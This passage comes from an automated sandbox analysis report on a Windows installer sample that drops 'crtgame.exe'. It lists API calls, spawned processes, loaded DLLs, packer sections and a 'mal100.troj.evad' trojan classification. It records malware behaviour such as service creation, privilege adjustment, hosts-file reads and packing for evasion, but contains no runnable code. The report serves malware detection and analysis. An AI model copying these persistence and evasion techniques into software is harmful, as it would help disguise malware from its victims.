                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00423B94 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_004125E8 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00477568 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0042E7A8 CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Code function: 0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_03101EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_03101140
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_031016B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A6B806
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A6BE1D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A6BE57
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A6B85F
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A35F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A3EA06
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A548E9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A4E065
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A52874
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A49944
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A4A6FA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A54E60
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A47F02
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A4D759
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A4DC4D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: String function: 02A54DF0 appears 137 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: String function: 02A485A0 appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00403400 appears 61 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00433D30 appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 004078FC appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00457114 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00403494 appears 82 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 004529A4 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00403684 appears 218 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: String function: 00456F08 appears 91 times
                  Source: KRdh0OaXqH.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: KRdh0OaXqH.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: KRdh0OaXqH.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: KRdh0OaXqH.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: KRdh0OaXqH.tmp.0.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: crtgame.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-4K1KF.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-4K1KF.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: is-4K1KF.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-4K1KF.tmp.1.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: SpaceXRaces.exe.5.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-2Q15C.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-UJQGJ.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-9OEDN.tmp.1.dr Static PE information: Number of sections : 18 > 10
                  Source: is-CJ9O9.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-MB554.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-PQ8T3.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-2BNI8.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs KRdh0OaXqH.exe
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs KRdh0OaXqH.exe
                  Source: KRdh0OaXqH.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: crtgame.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: _RegDLL.tmp.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SpaceXRaces.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: is-V3CB3.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9964533211297071
                  Source: is-HBA5G.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9976058467741935
                  Source: is-3PB3G.tmp.1.dr Static PE information: Section: ZLIB complexity 0.995148689516129
                  Source: is-O5AH5.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9908203125
                  Source: is-MSL58.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9903624487704918
                  Source: is-BLG4U.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9891526442307692
                  Source: is-RUH59.tmp.1.dr Binary or memory string: ?..la..dll.Unknown error %u occurred.sln
                  Source: classification engine Classification label: mal100.troj.evad.winEXE@15/128@7/3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02A402C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_00402548 lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0046D118 GetVersion,CoCreateInstance
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp File created: C:\Program Files (x86)\CRTGame
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Mutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe File created: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe File read: C:\Windows\System32\drivers\etc\hosts (recorded 6 times in the trace)
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-9OEDN.tmp.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: KRdh0OaXqH.exe ReversingLabs: Detection: 55%
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe File read: C:\Users\user\Desktop\KRdh0OaXqH.exe
                  Source: unknown Process created: C:\Users\user\Desktop\KRdh0OaXqH.exe "C:\Users\user\Desktop\KRdh0OaXqH.exe"
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Process created: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp "C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp" /SL5="$10440,6991381,54272,C:\Users\user\Desktop\KRdh0OaXqH.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                  Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: coremessaging.dll (recorded 2 times)
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: wintypes.dll (recorded 3 times)
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: shfolder.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: explorerframe.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Section loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Section loaded: apphelp.dll
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Section loaded: version.dll
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Section loaded: appxsip.dll
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Section loaded: opcservices.dll
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Section loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: KRdh0OaXqH.exeStatic file information: File size 7246011 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-AE6QK.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-BUF5F.tmp.1.dr

                  Data Obfuscation

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress, | 1_2_0044C030
Source: initial sample | Static PE information: section where entry point is pointing to: petite
Source: crtgame.exe.1.dr | Static PE information: section name: .hsave
Source: is-9AV62.tmp.1.dr | Static PE information: section name: /4
Source: is-TF38E.tmp.1.dr | Static PE information: section name: /4
Source: is-JN15J.tmp.1.dr | Static PE information: section name: /4
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /4
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /19
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /31
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /45
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /57
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /70
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /81
Source: is-9OEDN.tmp.1.dr | Static PE information: section name: /92
Source: is-BUF5F.tmp.1.dr | Static PE information: section name: .trace
Source: is-BUF5F.tmp.1.dr | Static PE information: section name: _RDATA
Source: is-BUF5F.tmp.1.dr | Static PE information: section name: .debug_o
Source: is-SEJ8F.tmp.1.dr | Static PE information: section name: /4
Source: is-RDHKR.tmp.1.dr | Static PE information: section name: /4
Source: is-8REH5.tmp.1.dr | Static PE information: section name: /4
Source: is-72UK0.tmp.1.dr | Static PE information: section name: /4
Source: is-UJQGJ.tmp.1.dr | Static PE information: section name: /4
Source: is-MB554.tmp.1.dr | Static PE information: section name: /4
Source: is-2BNI8.tmp.1.dr | Static PE information: section name: /4
Source: is-PQ8T3.tmp.1.dr | Static PE information: section name: /4
Source: is-R8DJL.tmp.1.dr | Static PE information: section name: /4
Source: is-V3CB3.tmp.1.dr | Static PE information: section name: (empty)
Source: is-V3CB3.tmp.1.dr | Static PE information: section name: (empty)
Source: is-V3CB3.tmp.1.dr | Static PE information: section name: petite
Source: is-ENF4U.tmp.1.dr | Static PE information: section name: /4
Source: is-82P0C.tmp.1.dr | Static PE information: section name: (empty)
Source: is-82P0C.tmp.1.dr | Static PE information: section name: (empty)
Source: is-82P0C.tmp.1.dr | Static PE information: section name: petite
Source: is-SG9N2.tmp.1.dr | Static PE information: section name: (empty)
Source: is-SG9N2.tmp.1.dr | Static PE information: section name: (empty)
Source: is-SG9N2.tmp.1.dr | Static PE information: section name: petite
Source: is-9QS5M.tmp.1.dr | Static PE information: section name: (empty)
Source: is-9QS5M.tmp.1.dr | Static PE information: section name: petite
Source: is-0NR14.tmp.1.dr | Static PE information: section name: (empty)
Source: is-0NR14.tmp.1.dr | Static PE information: section name: (empty)
Source: is-0NR14.tmp.1.dr | Static PE information: section name: petite
Source: is-4IVEL.tmp.1.dr | Static PE information: section name: /4
Source: is-1V1KO.tmp.1.dr | Static PE information: section name: .sxdata
